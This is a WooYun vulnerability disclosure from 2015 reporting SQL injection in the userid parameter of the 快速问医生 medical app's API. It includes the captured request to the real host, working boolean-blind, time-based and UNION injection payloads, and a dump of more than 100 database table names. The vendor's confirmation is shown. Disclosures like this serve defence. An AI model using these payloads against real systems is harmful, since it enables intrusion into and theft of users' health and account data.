当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147180

漏洞标题:快速问医生某处存在SQL注入(涉及大量用户数据含密码)

相关厂商:快速问医生

漏洞作者: Hancock

提交时间:2015-10-16 17:50

修复时间:2015-12-03 08:38

公开时间:2015-12-03 08:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-16: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开

简要描述:

快速问医生某处存在SQL注入

详细说明:

APP抓包:

GET /v6/credit/user_level?userid=44738151&openid=oklWyjFW3Nx03Qsn%2FdrJvw%3D%3D&wechat_id=android&uuid=862620029971316 HTTP/1.1
Host: zys.iapp.120.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Requested-With: com.ts.zys
User-Agent: android 4.1.1;862620029971316;zys 7.8.2;MI 2S zhjkyzYs safari webkit ;uname(18888888888);Mozilla/5.0 (Linux; U; Android 4.1.1; zh-cn; MI 2S Build/JRO03L) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7


参数userid

---
Parameter: userid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: userid=44738151' AND 3676=3676 AND 'XFdT'='XFdT&openid=oklWyjFW3Nx03Qsn/drJvw==&wechat_id=android&uuid=862620029971316
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: userid=44738151' AND (SELECT * FROM (SELECT(SLEEP(5)))tJxI) AND 'Yduf'='Yduf&openid=oklWyjFW3Nx03Qsn/drJvw==&wechat_id=android&uuid=862620029971316
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: userid=-3842' UNION ALL SELECT CONCAT(0x717a6a6a71,0x715751624d64506c4f67,0x71787a7871)-- &openid=oklWyjFW3Nx03Qsn/drJvw==&wechat_id=android&uuid=862620029971316
---


漏洞证明:

Database: app_user
[102 tables]
+-------------------------------+
| ask_mobile_user               |
| hd_address                    |
| hd_prize                      |
| hd_user                       |
| jf_help                       |
| jf_item                       |
| jf_prize                      |
| jf_user                       |
| jf_user_address               |
| jf_user_cost_detail           |
| jf_user_cost_detail_1         |
| jf_user_cost_detail_201302    |
| jf_user_cost_detail_201303    |
| jf_user_cost_detail_201304    |
| jf_user_dynamic               |
| jf_user_invite                |
| jf_user_prize                 |
| jf_user_prize_address         |
| mapp_collect_disease          |
| mapp_collect_doctor           |
| mapp_collect_question         |
| mapp_doctor                   |
| mapp_doctor_group             |
| mapp_pay                      |
| mapp_pay_list                 |
| mapp_pay_logs                 |
| mapp_pay_order_list           |
| mapp_pay_record               |
| mapp_uid_uuid_mapping         |
| mapp_user                     |
| mapp_user_action_logs         |
| mapp_user_active              |
| mapp_user_ask_error           |
| mapp_user_ask_normal          |
| mapp_user_asknums             |
| mapp_user_asknums_2012        |
| mapp_user_connect             |
| mapp_user_err                 |
| mapp_user_ext                 |
| mapp_user_give_liuna          |
| mapp_user_login_times         |
| mapp_user_pay                 |
| mapp_user_score_save          |
| mapp_user_uuid_relation       |
| mapp_user_version             |
| mapp_user_wxinfo              |
| mapp_user_zhs_relation        |
| mapp_userid_gtt               |
| mapp_uuid_drivers             |
| mapp_version_logs             |
| mapp_version_user_logs_2012   |
| mapp_version_user_logs_201301 |
| mapp_version_user_logs_201302 |
| mapp_version_user_logs_201303 |
| mapp_version_user_logs_201304 |
| mapp_version_user_logs_201305 |
| mapp_version_user_logs_201306 |
| mapp_version_user_logs_201307 |
| mapp_version_user_logs_201308 |
| mapp_version_user_logs_201309 |
| mapp_version_user_logs_201310 |
| mapp_version_user_logs_201311 |
| mapp_version_user_logs_201312 |
| mapp_version_user_logs_201401 |
| mapp_version_user_logs_201402 |
| mapp_version_user_logs_201403 |
| mapp_version_user_logs_201404 |
| mapp_version_user_logs_201405 |
| mapp_version_user_logs_201406 |
| mapp_version_user_logs_201407 |
| mapp_version_user_logs_201408 |
| mapp_version_user_logs_201409 |
| mapp_version_user_logs_201410 |
| mapp_version_user_logs_201411 |
| mapp_version_user_logs_201412 |
| mapp_version_user_logs_201501 |
| mapp_version_user_logs_201502 |
| mapp_version_user_logs_201503 |
| mapp_version_user_logs_201504 |
| mapp_version_user_logs_201505 |
| mapp_version_user_logs_201506 |
| mapp_version_user_logs_201507 |
| mapp_version_user_logs_201508 |
| mapp_version_user_logs_201509 |
| mapp_version_user_logs_201510 |
| mapp_version_user_logs_201511 |
| mapp_version_user_logs_201512 |
| mapp_version_user_logs_201601 |
| mapp_version_user_logs_201602 |
| mapp_version_user_logs_201603 |
| syn_collect_disease           |
| user_collect                  |
| user_exp_score_detail         |
| user_sign                     |
| user_sign_log                 |
| wx_user_cj                    |
| wx_user_flag                  |
| wxuser_dis_class              |
| wxuser_tags                   |
| zys_uuid_token                |
| zys_uuid_uid                  |
| zys_wrong_token               |
+-------------------------------+


涉及800多万用户

3.gif

修复方案:

版权声明:转载请注明来源 Hancock@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-19 08:38

厂商回复:

漏洞确认,感谢

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-16 18:12 | Hancock ( 普通白帽子 | Rank:492 漏洞数:83 )

    为毛要加后面的标题、对厂商影响不好啊

  2. 2015-10-16 18:15 | JGHOOluwa ( 普通白帽子 | Rank:353 漏洞数:57 | 就是来看看大牛们如何超神的^-^)

    @Hancock 这厂商很好很客气的~